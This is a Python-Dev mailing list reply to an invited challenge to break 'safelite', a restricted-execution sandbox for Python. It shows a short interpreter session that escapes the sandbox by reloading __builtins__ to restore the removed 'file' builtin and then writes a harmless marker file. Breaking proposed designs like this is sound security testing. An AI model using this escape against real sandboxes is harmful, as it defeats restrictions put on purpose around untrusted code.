[Python-Dev] Challenge: Please break this! (was: Reviving restricted mode)
Victor Stinner
victor.stinner at haypocalc.com
Mon Feb 23 22:12:12 CET 2009
> The challenge is simple:
>
> * Open a fresh Python interpreter
> * Do: >>> from safelite import FileReader
> * You can use FileReader to read files on your filesystem
> * Now find a way to *write* to the filesystem from your interpreter
Well, the challenge is to get access to a module. And... it's quite simple :-p
$ ./python
>>> from safelite import FileReader
>>> __builtins__.file
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'file'
>>> reload(__builtins__)
<module '__builtin__' (built-in)>
>>> file('0wn3d', 'w').write('w00t\n')
>>>
$ cat 0wn3d
w00t
> Dinner and drinks on me for an evening -- when you are next in London
> or I am in your town -- to the first person who manages to break
> safelite.py and write to the filesystem.
Cool. It's a good reason to go to Pycon UK this yeak ;-)
--
Victor Stinner aka haypo
http://www.haypocalc.com/blog/
More information about the Python-Dev
mailing list